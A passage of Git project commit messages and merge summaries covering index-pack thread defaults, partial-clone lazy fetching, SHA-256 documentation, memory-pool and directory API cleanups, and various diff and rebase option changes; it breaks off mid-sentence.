dd4b732df7 ("upload-pack: send part of packfile response as uri",
2020-06-10) added the "only_packfile" parameter to get_pack() but did
not document it. Add documentation.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The patch-id computation did not ignore the "incomplete last line"
marker like whitespaces.
* rs/patch-id-with-incomplete-line:
patch-id: ignore newline at end of file in diff_flush_patch_id()
Doc updates for subtree (in contrib/)
* dl/subtree-docs:
contrib/subtree: document 'push' does not take '--squash'
contrib/subtree: fix "unsure" for --message in the document
The recent addition of SHA-256 support is marked as experimental in
the documentation.
* ma/doc-sha-256-is-experimental:
Documentation: mark `--object-format=sha256` as experimental
Use more buffered I/O where we used to call many small write(2)s.
* rs/more-buffered-io:
upload-pack: use buffered I/O to talk to rev-list
midx: use buffered I/O to talk to pack-objects
connected: use buffered I/O to talk to rev-list
"ls-files -o" mishandled the top-level directory of another git
working tree that hangs in the current git working tree.
* en/dir-nonbare-embedded:
dir: avoid prematurely marking nonbare repositories as matches
t3000: fix some test description typos
The "--batch-size" option of "git multi-pack-index repack" command
is now used to specify that very small packfiles are collected into
one until the total size roughly exceeds it.
* ds/midx-repack-to-batch-size:
multi-pack-index: repack batches below --batch-size
The purpose of "git init --separate-git-dir" is to initialize a
new project with the repository separate from the working tree,
or, in the case of an existing project, to move the repository
(the .git/ directory) out of the working tree. It does not make
sense to use --separate-git-dir with a bare repository for which
there is no working tree, so disallow its use with bare
repositories.
* es/init-no-separate-git-dir-in-bare:
init: disallow --separate-git-dir with bare repository
A subsequent commit will make the quantum of work smaller, necessitating
more locking. This commit allows resolve_delta() to be called outside
the lock.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is refactoring 2 of 2 to simplify struct base_data.
Whenever we make a struct base_data, immediately calculate its delta
children. This eliminates confusion as to when the
{ref,ofs}_{first,last} fields are initialized.
Before this patch, the delta children were calculated at the last
possible moment. This allowed the members of struct base_data to be
populated in any order, superficially useful when we have the object
contents before the struct object_entry. But this makes reasoning about
the state of struct base_data more complicated, hence this patch.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is refactoring 1 of 2 to simplify struct base_data.
In index-pack, each thread maintains a doubly-linked list of the delta
chain that it is currently processing (the "base" and "child" pointers
in struct base_data). When a thread exceeds the delta base cache limit
and needs to reclaim memory, it uses the "child" pointers to traverse
the lineage, reclaiming the memory of the eldest delta bases first.
A subsequent patch will perform memory reclaiming in a different way and
will thus no longer need the "child" pointer. Because the "child"
pointer is redundant even now, remove it so that the aforementioned
subsequent patch will be clearer. In the meantime, reclaim memory in the
reverse order of the "base" pointers.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
find_{ref,ofs}_delta_{,children} take an enum object_type parameter, but
the object type is already present in the name of the function. Remove
that parameter from these functions.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Clarify that core.deltaBaseCacheLimit is per-thread, as can be seen from
the fact that cache usage (base_cache_used in struct thread_local in
builtin/index-pack.c) is tracked individually for each thread and
compared against delta_base_cache_limit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Ensure that the [--first-parent] option is listed in the output of
"git bisect -h".
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pathspec given to git checkout and git restore is used with both
tree_entry_interesting (via read_tree_recursive) and match_pathspec
(via ce_path_match). The latter effectively only supports recursive
matching regardless of the value of the pathspec flag "recursive",
which is unset here.
That causes different match results for pathspecs with wildcards, and
can lead checkout and restore in no-overlay mode to remove entries
instead of modifying them. Enable recursive matching for both checkout
and restore to make matching consistent.
Setting the flag in checkout_main() technically also affects git switch,
but since that command doesn't accept pathspecs at all this has no
actual consequence.
Reported-by: Sergii Shkarnikov <sergii.shkarnikov@globallogic.com>
Initial-test-by: Sergii Shkarnikov <sergii.shkarnikov@globallogic.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If `user.name` and `user.email` have not been configured and the
user invokes:
git commit --author=...
without specifying the committer identity, then Git errors out with
a message asking the user to configure `user.name` and `user.email`
but doesn't tell the user which attribution was missing. This can be
confusing for a user new to Git who isn't aware of the distinction
between user, author, and committer.
Give such users a bit more help by extending the error message to
also say which attribution is expected.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'contents' atom does not show any error if used with 'trailers'
atom and colon is missing before trailers arguments.
e.g %(contents:trailersonly) works, while it shouldn't.
It is definitely not an expected behavior.
Let's fix this bug.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A handful of Git's commands respect `--abbrev' for customizing length
of abbreviation of object names.
For diff-family, Git supports 2 different options for 2 different
purposes, `--full-index' for showing diff-patch object's name in full,
and `--abbrev' to customize the length of object names in diff-raw and
diff-tree header lines, without any options to customise the length of
object names in diff-patch format. When working with diff-patch format,
we only have two options, either full index, or default abbrev length.
Although, that behaviour is documented, it doesn't stop users from
trying to use `--abbrev' with the hope of customising diff-patch's
objects' name's abbreviation.
Let's allow the blob object names shown on the "index" line to be
abbreviated to arbitrary length given via the "--abbrev" option.
To preserve backward compatibility with old script that specify both
`--full-index' and `--abbrev', always show full object id
if `--full-index' is specified.
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
From 72f936b1 (t4013: make test hash independent, 2020-02-07),
we started to adjust metadata of git-diff's output in order to
ignore uninteresting metadata which is dependent of underlying hash
algorithm.
However, we forgot to special case all-zero object names, which is
special for missing objects, in consequence, we could't catch
possible future bugs where object names is all-zeros including but
not limited to:
* show intend-to-add entry
* deleted entry
* diff between index and working tree with new file
We also mistakenly munged file-modes as if they were object names
abbreviated to 6 hexadecimal digits.
In addition, in the upcoming change, we would like to test for
customizing the length of abbreviated blob objects on the index line,
which is not supported by current diff-processor logic.
Let's fix the bug for all-zero object names, and file modes.
While we're at it, support abbreviation of object names up to 16 bytes.
Based-on-patch-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, there are different tests for testing %(trailers) and
%(contents:trailers) causing redundant copy.
Its time to get rid of duplicate code.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While YAML allows different indentation styles as long as each block
is consistent, it is rather unusual to mix different indentations in
a single file. Adjust to use two-space indentation everywhere.
Signed-off-by: Adrian Moennich <adrian@planetcoding.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit b8a2486f15 (index-pack: support multithreaded delta resolving,
2012-05-06) describes an experiment that shows that setting the number
of threads for index-pack higher than 3 does not help.
I repeated that experiment using a more modern version of Git and a more
modern CPU and got different results.
Here are timings for p5302 against linux.git run on my laptop, a Core
i9-9880H with 8 cores plus hyperthreading (so online-cpus returns 16):
5302.3: index-pack 0 threads 256.28(253.41+2.79)
5302.4: index-pack 1 threads 257.03(254.03+2.91)
5302.5: index-pack 2 threads 149.39(268.34+3.06)
5302.6: index-pack 4 threads 94.96(294.10+3.23)
5302.7: index-pack 8 threads 68.12(339.26+3.89)
5302.8: index-pack 16 threads 70.90(655.03+7.21)
5302.9: index-pack default number of threads 116.91(290.05+3.21)
You can see that wall-clock times continue to improve dramatically up to
the number of cores, but bumping beyond that (into hyperthreading
territory) does not help (and in fact hurts a little).
Here's the same experiment on a machine with dual Xeon 6230's, totaling
40 cores (80 with hyperthreading):
5302.3: index-pack 0 threads 310.04(302.73+6.90)
5302.4: index-pack 1 threads 310.55(302.68+7.40)
5302.5: index-pack 2 threads 178.17(304.89+8.20)
5302.6: index-pack 5 threads 99.53(315.54+9.56)
5302.7: index-pack 10 threads 72.80(327.37+12.79)
5302.8: index-pack 20 threads 60.68(357.74+21.66)
5302.9: index-pack 40 threads 58.07(454.44+67.96)
5302.10: index-pack 80 threads 59.81(720.45+334.52)
5302.11: index-pack default number of threads 134.18(309.32+7.98)
The results are similar; things stop improving at 40 threads. Curiously,
going from 20 to 40 really doesn't help much, either (and increases CPU
time considerably). So that may represent an actual barrier to
parallelism, where we lose out due to context-switching and loss of
cache locality, but don't reap the wall-clock benefits due to contention
of our coarse-grained locks.
So what's a good default value? It's clear that the current cap of 3 is
too low; our default values are 42% and 57% slower than the best times
on each machine. The results on the 40-core machine imply that 20
threads is an actual barrier regardless of the number of cores, so we'll
take that as a maximum. We get the best results on these machines at
half of the online-cpus value. That's presumably a result of the
hyperthreading. That's common on multi-core Intel processors, but not
necessarily elsewhere. But if we take it as an assumption, we can
perform optimally on hyperthreaded machines and still do much better
than the status quo on other machines, as long as we never half below
the current value of 3.
So that's what this patch does.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When PERF_EXTRA is enabled, p5302 checks the performance of index-pack
with various numbers of threads. This can be useful for deciding what
the default should be (which is currently capped at 3 threads based on
the results of this script).
However, we only go up to 8 threads, and modern machines may have more.
Let's get the number of CPUs from test-tool, and test various numbers of
threads between one and that maximum.
Note that the current tests aren't all identical, as we have to set
GIT_FORCE_THREADS for the --threads=1 test (which measures the overhead
of starting a single worker thread versus the "0" case of using the main
thread). To keep the loop simple, we'll keep the "0" case out of it, and
set GIT_FORCE_THREADS=1 for all of the other cases (it's a noop for all
but the "1" case, since numbers higher than 1 would always need
threads).
Note also that we could skip running "test-tool" if PERF_EXTRA isn't
set. However, there's some small value in knowing the number of threads,
so that we can mark each test as skipped in the output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The primary function of the perf suite is to detect regressions (or
improvements) between versions of Git. The only numbers we show a direct
comparison for are timings between the same test run on two different
versions.
However, it can sometimes be used to collect other information. For
instance, p5302 runs the same index-pack operation with different thread
counts. The output doesn't directly compare these, but anybody
interested in working on index-pack can manually compare the results.
For a normal regression run of the full perf-suite, though, this incurs
a significant cost to generate numbers nobody will actually look at;
about 25% of the total time of the test suite is spent in p5302. And the
low-thread-count runs are the most expensive part of it, since they're
(unsurprisingly) not using as many threads.
Let's skip these tests by default, but make it possible for people
working on index-pack to still run them by setting an environment
variable. Rather than make this specific to p5302, let's introduce a
generic mechanism. This makes it possible to run the full suite with
every possible test if somebody really wants to burn some CPU.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a NEEDSWORK regarding the outdated syntax and working of the test,
which may need to be improved to obtain better and desired results.
While at it, change the word 'test' to 'test script' in the test
description to avoid ambiguity.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the test_i18ncmp syntax from 'test_i18ncmp actual expected' to
'test_i18ncmp expected actual' to align it with the convention followed
by other tests in the test script.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git rev-parse' can limit the number of characters in the hash it
outputs using the '--short' option, thereby, making the 'cut' invocation
redundant. Since using '--short' implies '--verify' as well, we can
safely replace the latter with the former. This change results in the
helper functions getting the hash in the same way 'summary' gets the
hash internally.
So, avoid the unnecessary invocation to 'cut' in the helper
functions.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pseudorefs move to a different ref storage mechanism, pseudorefs no longer
can be removed with 'rm'. Instead, suggest a "update-ref -d" command, which will
work regardless of ref storage backend.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Check for existence and delete CHERRY_PICK_HEAD through ref functions.
This will help cherry-pick work with alternate ref storage backends.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will be necessary to replace file existence checks for pseudorefs.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The blurb for "--cached" says it implies "--index", but in reality
"--cached" and "--index" are distinct modes with different behavior.
Additionally, the descriptions of "--index" and "--cached" are somewhat
unclear about what might be modified, and what "--index" looks for to
determine that the index and working copy "match".
Rewrite the blurbs for both options for clarity and accuracy.
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When fetching a pack from a promisor remote, the corresponding .promisor
file needs to be created. "fetch-pack" originally did this by passing
"--promisor" to "index-pack", but in 5374a290aa ("fetch-pack: write
fetched refs to .promisor", 2019-10-16), "fetch-pack" was taught to do
this itself instead, because it needed to store ref information in the
.promisor file.
This causes a problem with superprojects when transfer.fsckobjects is
set, because in the current implementation, it is "index-pack" that
calls fsck_finish() to check the objects; before 5374a290aa,
fsck_finish() would see that .gitmodules is a promisor object and
tolerate it being missing, but after, there is no .promisor file (at the
time of the invocation of fsck_finish() by "index-pack") to tell it that
.gitmodules is a promisor object, so it returns an error.
Therefore, teach "fetch-pack" to pass "--promisor" to index pack once
again. "fetch-pack" will subsequently overwrite this file with the ref
information.
An alternative is to instead move object checking to "fetch-pack", and
let "index-pack" only index the files. However, since "index-pack" has
to inflate objects in order to index them, it seems reasonable to also
let it check the objects (which also require inflated files).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When options such as --ignore-space-change are in use, files with
modifications can have no interesting textual changes worth showing. In
such cases, "git diff --stat" shows 0 lines of additions and deletions.
Teach "git diff --stat" not to show such a path in its output, which
would be more natural.
However, we don't want to prevent the display of all files that have 0
effective diffs since they could be the result of a rename, permission
change, or other similar operation that may still be of interest so we
special case additions and deletions as they are always interesting.
Signed-off-by: Matthew Rogers <mattr94@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When set to 1, GIT_COMPLETION_SHOW_ALL causes --git-completion-helper-all
to be passed instead of --git-completion-helper.
Signed-off-by: Ryan Zoeller <rtzoeller@rtzoeller.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
--git-completion-helper excludes hidden options, such as --allow-empty
for git commit. This is typically helpful, but occasionally we want
auto-completion for obscure flags. --git-completion-helper-all returns
all options, even if they are marked as hidden or nocomplete.
Signed-off-by: Ryan Zoeller <rtzoeller@rtzoeller.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
midx and commit-graph files now use the byte defined in their file
format specification for identifying the hash function used for
object names.
* ds/sha256-leftover-bits:
multi-pack-index: use hash version byte
commit-graph: use the "hash version" byte
t/README: document GIT_TEST_DEFAULT_HASH
Further update of docs to adjust to the recent SHA-256 work.
* ma/sha-256-docs:
shallow.txt: document SHA-256 shallow format
protocol-capabilities.txt: clarify "allow-x-sha1-in-want" re SHA-256
index-format.txt: document SHA-256 index format
http-protocol.txt: document SHA-256 "want"/"have" format
A few end-user facing messages have been updated to be
hash-algorithm agnostic.
* jc/object-names-are-not-sha-1:
messages: avoid SHA-1 in end-user facing messages
Further update of docs to adjust to the recent SHA-256 work.
* bc/sha-256-doc-updates:
docs: fix step in transition plan
docs: document SHA-256 pack and indices
The regexp to identify the function boundary for FORTRAN programs
has been updated.
* pb/userdiff-fortran-update:
userdiff: improve Fortran xfuncname regex
userdiff: add tests for Fortran xfuncname regex
When given more than one target line ranges, "git blame -La,b
-Lc,d" was over-eager to coalesce groups of original lines and
showed incorrect results, which has been corrected.
* jk/blame-coalesce-fix:
blame: only coalesce lines that are adjacent in result
t8003: factor setup out of coalesce test
t8003: check output of coalesced blame
Ring buffer with size 4 used for bin-hex translation resulted in a
wrong object name in the sequencer's todo output, which has been
corrected.
* ak/sequencer-fix-find-uniq-abbrev:
rebase -i: fix possibly wrong onto hash in todo
The commit labels used to explain each side of conflicted hunks
placed by the sequencer machinery have been made more readable by
humans.
* en/sequencer-merge-labels:
sequencer: avoid garbled merge machinery messages due to commit labels
"git diff [<tree-ish>] $path" for a $path that is marked with i-t-a
bit was not showing the mode bits from the working tree.
* rp/ita-diff-modefix:
diff-lib: use worktree mode in diffs from i-t-a entries
Updates to "git merge" tests, in preparation for a new merge
strategy backend.
* en/merge-tests:
t6425: be more flexible with rename/delete conflict messages
t642[23]: be more flexible for add/add conflicts involving pair renames
t6422, t6426: be more flexible for add/add conflicts involving renames
t6423: add an explanation about why one of the tests does not pass
t6416, t6423: clarify some comments and fix some typos
t6422: fix multiple errors with the mod6 test expectations
t6423: fix test setup for a couple tests
t6416, t6422: fix incorrect untracked file count
t6422: fix bad check against missing file
t6418: tighten delete/normalize conflict testcase
Collect merge-related tests to t64xx
The previous commit introduced --ignore-date flag to rebase -i, but the
name is rather vague as it does not say whether the author date or the
committer date is ignored. Add an alias to convey the precise purpose.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rebase is implemented with two different backends - 'apply' and
'merge' each of which support a different set of options. In
particular the apply backend supports a number of options implemented
by 'git am' that are not implemented in the merge backend. This means
that the available options are different depending on which backend is
used which is confusing. This patch adds support for the --ignore-date
option to the merge backend. This option uses the current time as the
author date rather than reusing the original author date when
rewriting commits. We take care to handle the combination of
--ignore-date and --committer-date-is-author-date in the same way as
the apply backend.
Original-patch-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The FETCH_HEAD and MERGE_HEAD refs must be stored in a file, regardless of the
type of ref backend. This is because they can hold more than just a single ref.
To accomodate them for alternate ref backends, read them from a file generically
in refs_read_raw_ref()
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This prepares for handling FETCH_HEAD (which is not a regular ref)
separately from the ref backend.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The dir structure seemed to have a number of leaks and problems around
it. First I noticed that parent_hashmap and recursive_hashmap were
being leaked (though Peff noticed and submitted fixes before me). Then
I noticed in the previous commit that clear_directory() was only taking
responsibility for a subset of fields within dir_struct, despite the
fact that entries[] and ignored[] we allocated internally to dir.c.
That, of course, resulted in many callers either leaking or haphazardly
trying to free these arrays and their contents.
Digging further, I found that despite the pretty clear documentation
near the top of dir.h that folks were supposed to call clear_directory()
when the user no longer needed the dir_struct, there were four callers
that didn't bother doing that at all. However, two of them clearly
thought about leaks since they had an UNLEAK(dir) directive, which to me
suggests that the method to free the data was too unclear. I suspect
the non-obviousness of the API and its holes led folks to avoid it,
which then snowballed into further problems with the entries[],
ignored[], parent_hashmap, and recursive_hashmap problems.
Rename clear_directory() to dir_clear() to be more in line with other
data structures in git, and introduce a dir_init() to handle the
suggested memsetting of dir_struct to all zeroes. I hope that a name
like "dir_clear()" is more clear, and that the presence of dir_init()
will provide a hint to those looking at the code that they need to look
for either a dir_clear() or a dir_free() and lead them to find
dir_clear().
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The calling convention for the dir API is supposed to end with a call to
clear_directory() to free up no longer needed memory. However,
clear_directory() didn't free dir->entries or dir->ignored. I believe
this was an oversight, but a number of callers noticed memory leaks and
started free'ing these. Unfortunately, they did so somewhat haphazardly
(sometimes freeing the entries in the arrays, and sometimes only
free'ing the arrays themselves). This suggests the callers weren't
trying to make sure any possible memory used might be free'd, but just
the memory they noticed their usecase definitely had allocated.
Fix this mess by moving all the duplicated free'ing logic into
clear_directory(). End by resetting dir to a pristine state so it could
be reused if desired.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that Git has switched to using a subprocess to lazy-fetch missing
objects, remove the no_dependents code as it is no longer used.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach Git to lazy-fetch missing objects in a subprocess instead of doing
it in-process. This allows any fatal errors that occur during the fetch
to be isolated and converted into an error return value, instead of
causing the current command being run to terminate.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Whitespace is ignored when calculating patch IDs. This is done by
removing all whitespace from diff lines before hashing them, including
a newline at the end of a file. If that newline is missing, however,
diff reports that fact in a separate line containing "\ No newline at
end of file\n", and this marker is hashed like a context line.
This goes against our goal of making patch IDs independent of
whitespace. Use the same heuristic that 2485eab55c (git-patch-id: do
not trip over "no newline" markers, 2011-02-17) added to git patch-id
instead and skip diff lines that start with a backslash and a space
and are longer than twelve characters.
Reported-by: Tilman Vogel <tilman.vogel@web.de>
Initial-test-by: Tilman Vogel <tilman.vogel@web.de>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This if statement never evaluates to true since we already check
state->force a few lines above, and immediately return when it is
false.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to determine negotiation tips, "fetch-pack" iterates over all
refs and dereferences all annotated tags found. This causes the
existence of targets of refs and annotated tags to be checked. Avoiding
this is especially important when we use "git fetch" (which invokes
"fetch-pack") to perform lazy fetches in a partial clone because a
target of such a ref or annotated tag may need to be itself lazy-fetched
(and otherwise causing an infinite loop).
Therefore, teach "fetch-pack" not to lazy fetch whenever iterating over
refs. This is done by using the raw form of ref iteration and by
dereferencing tags ourselves.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In "fetch", get_ref_map() iterates over all refs to populate
"existing_refs" in order to populate peer_ref->old_oid in the returned
refmap, even if the refmap has no peer_ref set - which is the case when
only literal hashes (i.e. no refs by name) are fetched.
Iterating over refs causes the targets of those refs to be checked for
existence. Avoiding this is especially important when we use "git fetch"
to perform lazy fetches in a partial clone because a target of such a
ref may need to be itself lazy-fetched (and otherwise causing an
infinite loop).
Therefore, avoid populating "existing_refs" until necessary. With this
patch, because Git lazy-fetches objects by literal hashes (to be done in
a subsequent commit), it will then be able to guarantee avoiding reading
targets of refs.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In "fetch", there are two parameters submodule_fetch_jobs_config and
recurse_submodules that can be set in a variety of ways: through
.gitmodules, through .git/config, and through the command line.
Currently "fetch" handles this by first reading .gitmodules, then
reading .git/config (allowing it to overwrite existing values), then
reading the command line (allowing it to overwrite existing values).
Notice that we can avoid reading .gitmodules if .git/config and/or the
command line already provides us with what we need. In addition, if
recurse_submodules is found to be "no", we do not need the value of
submodule_fetch_jobs_config.
Avoiding reading .gitmodules is especially important when we use "git
fetch" to perform lazy fetches in a partial clone because the
.gitmodules file itself might need to be lazy fetched (and otherwise
causing an infinite loop).
In light of all this, avoid reading .gitmodules until necessary. When
reading it, we may only need one of the two parameters it provides, so
teach fetch_config_from_gitmodules() to support NULL arguments. With
this patch, users (including Git itself when invoking "git fetch" to
lazy-fetch) will be able to guarantee avoiding reading .gitmodules by
passing --recurse-submodules=no.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a subsequent patch, partial clones will be taught to fetch missing
objects using a "git fetch" subprocess. Because the number of objects
fetched may be too numerous to fit on the command line, teach "fetch" to
accept refspecs passed through stdin.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a noop fetch negotiator. This is introduced to allow partial clones
to skip the unneeded negotiation step when fetching missing objects
using a "git fetch" subprocess. (The implementation of spawning a "git
fetch" subprocess will be done in a subsequent patch.) But this can also
be useful for end users, e.g. as a blunt fix for object corruption.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If you run fetch but record the result in remote-tracking branches,
and either if you do nothing with the fetched refs (e.g. you are
merely mirroring) or if you always work from the remote-tracking
refs (e.g. you fetch and then merge origin/branchname separately),
you can get away with having no FETCH_HEAD at all.
Teach "git fetch" a command line option "--[no-]write-fetch-head".
The default is to write FETCH_HEAD, and the option is primarily
meant to be used with the "--no-" prefix to override this default,
because there is no matching fetch.writeFetchHEAD configuration
variable to flip the default to off (in which case, the positive
form may become necessary to defeat it).
Note that under "--dry-run" mode, FETCH_HEAD is never written;
otherwise you'd see list of objects in the file that you do not
actually have. Passing `--write-fetch-head` does not force `git
fetch` to write the file.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
About half the function declarations in mem-pool.h used 'struct mem_pool
*pool', while the other half used 'struct mem_pool *mem_pool'. Make the
code a bit more consistent by just using 'pool' in preference to
'mem_pool' everywhere.
No behavioral changes included; this is just a mechanical rename (though
a line or two was rewrapped as well).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A typical memory type, such as strbuf, hashmap, or string_list can be
stored on the stack or embedded within another structure. mem_pool
cannot be, because of how mem_pool_init() and mem_pool_discard() are
written. mem_pool_init() does essentially the following (simplified
for purposes of explanation here):
void mem_pool_init(struct mem_pool **pool...)
{
*pool = xcalloc(1, sizeof(*pool));
It seems weird to require that mem_pools can only be accessed through a
pointer. It also seems slightly dangerous: unlike strbuf_release() or
strbuf_reset() or string_list_clear(), all of which put the data
structure into a state where it can be re-used after the call,
mem_pool_discard(pool) will leave pool pointing at free'd memory.
read-cache (and split-index) are the only current users of mem_pools,
and they haven't fallen into a use-after-free mistake here, but it seems
likely to be problematic for future users especially since several of
the current callers of mem_pool_init() will only call it when the
mem_pool* is not already allocated (i.e. is NULL).
This type of mechanism also prevents finding synchronization
points where one can free existing memory and then resume more
operations. It would be natural at such points to run something like
mem_pool_discard(pool...);
and, if necessary,
mem_pool_init(&pool...);
and then carry on continuing to use the pool. However, this fails badly
if several objects had a copy of the value of pool from before these
commands; in such a case, those objects won't get the updated value of
pool that mem_pool_init() overwrites pool with and they'll all instead
be reading and writing from free'd memory.
Modify mem_pool_init()/mem_pool_discard() to behave more like
strbuf_init()/strbuf_release()
or
string_list_init()/string_list_clear()
In particular: (1) make mem_pool_init() just take a mem_pool* and have
it only worry about allocating struct mp_blocks, not the struct mem_pool
itself, (2) make mem_pool_discard() free the memory that the pool was
responsible for, but leave it in a state where it can be used to
allocate more memory afterward (without the need to call mem_pool_init()
again).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
fast-import had a special mem_pool_strdup() convenience function that I
want to be able to use from the new merge algorithm I am writing. Move
it from fast-import to mem-pool, and also add a mem_pool_strndup()
while at it that I also want to use.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git subtree push does not support --squash, as previously illustrated in
6ccc71a9 (contrib/subtree: there's no push --squash, 2015-05-07)
Signed-off-by: Danny Lin <danny0838@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Revise the documentation and remove previous "unsure" after making sure
that --message supports only 'add', 'merge', 'pull', and 'split --rejoin'.
Signed-off-by: Danny Lin <danny0838@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Earlier, to countermand the implicit "-m" option when the
"--first-parent" option is used with "git log", we added the
"--[no-]diff-merges" option in the jk/log-fp-implies-m topic. To
leave the door open to allow the "--diff-merges" option to take
values that instructs how patches for merge commits should be
computed (e.g. "cc"? "-p against first parent?"), redefine
"--diff-merges" to take non-optional value, and implement "off"
that means the same thing as "--no-diff-merges".
* so/log-diff-merges-opt:
t/t4013: add test for --diff-merges=off
doc/git-log: describe --diff-merges=off
revision: change "--diff-merges" option to require parameter
"git log --first-parent -p" showed patches only for single-parent
commits on the first-parent chain; the "--first-parent" option has
been made to imply "-m". Use "--no-diff-merges" to restore the
previous behaviour to omit patches for merge commits.
* jk/log-fp-implies-m:
doc/git-log: clarify handling of merge commit diffs
doc/git-log: move "-t" into diff-options list
doc/git-log: drop "-r" diff option
doc/git-log: move "Diff Formatting" from rev-list-options
log: enable "-m" automatically with "--first-parent"
revision: add "--no-diff-merges" option to counteract "-m"
log: drop "--cc implies -m" logic
Recent versions of "git diff-files" shows a diff between the index
and the working tree for "intent-to-add" paths as a "new file"
patch; "git apply --cached" should be able to take "git diff-files"
